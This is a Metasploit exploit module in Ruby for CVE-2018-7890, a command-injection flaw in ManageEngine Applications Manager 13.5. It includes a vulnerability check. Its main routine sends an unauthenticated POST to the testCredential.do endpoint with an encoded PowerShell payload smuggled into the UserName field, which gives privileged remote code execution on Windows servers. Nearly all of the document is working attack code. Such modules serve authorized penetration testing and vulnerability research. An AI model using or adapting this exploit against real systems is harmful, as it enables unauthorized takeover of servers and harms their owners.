ManageEngine Applications Manage 13.5 Remote Code Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Powershell  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "ManageEngine Applications Manager Remote Code Execution",  
'Description' => %q{  
This module exploits command injection vulnerability in the ManageEngine Application Manager product.  
An unauthenticated user can execute a operating system command under the context of privileged user.  
  
Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials  
by accessing given system. This endpoint calls a several internal classes and then executes powershell script  
without validating user supplied parameter when the given system is OfficeSharePointServer.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Mehmet Ince <[email protected]>' # author & msf module  
],  
'References' =>  
[  
['CVE', '2018-7890'],  
['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']  
],  
'DefaultOptions' =>  
{  
'WfsDelay' => 10,  
'RPORT' => 9090  
},  
'Payload' =>  
{  
'BadChars' => "\x22"  
},  
'Platform' => ['win'],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'Targets' => [ ['Automatic', {}] ],  
'Privileged' => true,  
'DisclosureDate' => 'Mar 7 2018',  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])  
]  
)  
end  
  
def check  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),  
'vars_post' => {  
'method' => 'testCredentialForConfMonitors',  
'type' => 'OfficeSharePointServer',  
'montype' => 'OfficeSharePointServer',  
'isAgentEnabled' => 'NO',  
'isAgentAssociated' => 'false',  
'displayname' => Rex::Text.rand_text_alpha(10),  
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...  
'Version' => '2013',  
'Powershell' => 'True', # :-)  
'CredSSP' => 'False',  
'SPType' => 'SPServer',  
'CredentialDetails' => 'nocm',  
'Password' => Rex::Text.rand_text_alpha(3),  
'UserName' => Rex::Text.rand_text_alpha(3)  
}  
})  
if res && res.body.include?('Kindly check the credentials and try again')  
Exploit::CheckCode::Vulnerable  
else  
Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
  
powershell_options = {  
encode_final_payload: true,  
remove_comspec: true  
}  
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)  
  
print_status('Triggering the vulnerability')  
  
send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),  
'vars_post' => {  
'method' => 'testCredentialForConfMonitors',  
'type' => 'OfficeSharePointServer',  
'montype' => 'OfficeSharePointServer',  
'isAgentEnabled' => 'NO',  
'isAgentAssociated' => 'false',  
'displayname' => Rex::Text.rand_text_alpha(10),  
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...  
'Version' => '2013',  
'Powershell' => 'True', # :-)  
'CredSSP' => 'False',  
'SPType' => 'SPServer',  
'CredentialDetails' => 'nocm',  
'Password' => Rex::Text.rand_text_alpha(3),  
'UserName' => "$(#{p})"  
}  
})  
  
end  
end  
  
`